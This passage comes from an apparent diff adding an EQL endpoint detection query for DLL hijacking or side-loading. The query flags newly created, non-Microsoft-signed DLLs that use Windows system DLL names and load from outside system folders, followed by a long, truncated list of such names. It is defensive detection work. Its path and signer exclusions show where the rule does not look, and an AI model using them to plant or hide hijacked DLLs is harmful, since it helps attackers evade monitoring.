+ "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time <= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", 
\"acproxy.dll\", \"acspecfc.dll\", \"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", \"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", 
\"authfwwizfwk.dll\", \"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", \"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", 
\"cfgmgr32.dll\", \"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", \"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", 
\"cryptnet.dll\", \"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", \"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", 
\"dhcpcore6.dll\", \"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", \"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", 
\"dtsh.dll\", \"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", \"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", \"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", 
\"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", \"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", \"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", 
\"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", \"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", 
\"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", \"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", \"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", 
\"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", \"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", 
\"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", \"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", 